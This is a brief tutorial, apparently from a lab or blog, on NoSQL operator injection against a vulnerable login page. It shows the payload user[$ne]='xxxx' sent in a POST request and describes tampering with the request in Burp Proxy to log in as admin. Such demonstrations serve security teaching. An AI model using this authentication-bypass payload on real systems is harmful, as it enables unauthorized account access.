Example 1

Here I have a vulnerable login page.

Here we can use operator based injection. If we do ['user' = ['$ne' ⇒ 'xxxx']] then this can trick the database into returning all documents which are NOT having the value xxxx in the user key. We can do the same for password field also.

But if we have to pass it as POST request via PHP then the syntax is changed a little as follows.

In the given login page we will use user[$ne]='xxxx' and the same for password field also.

I ran Burp Proxy and grabbed the POST request being sent from the login form. I altered the queries as follows.

After that I forwarded that request and logged in as admin.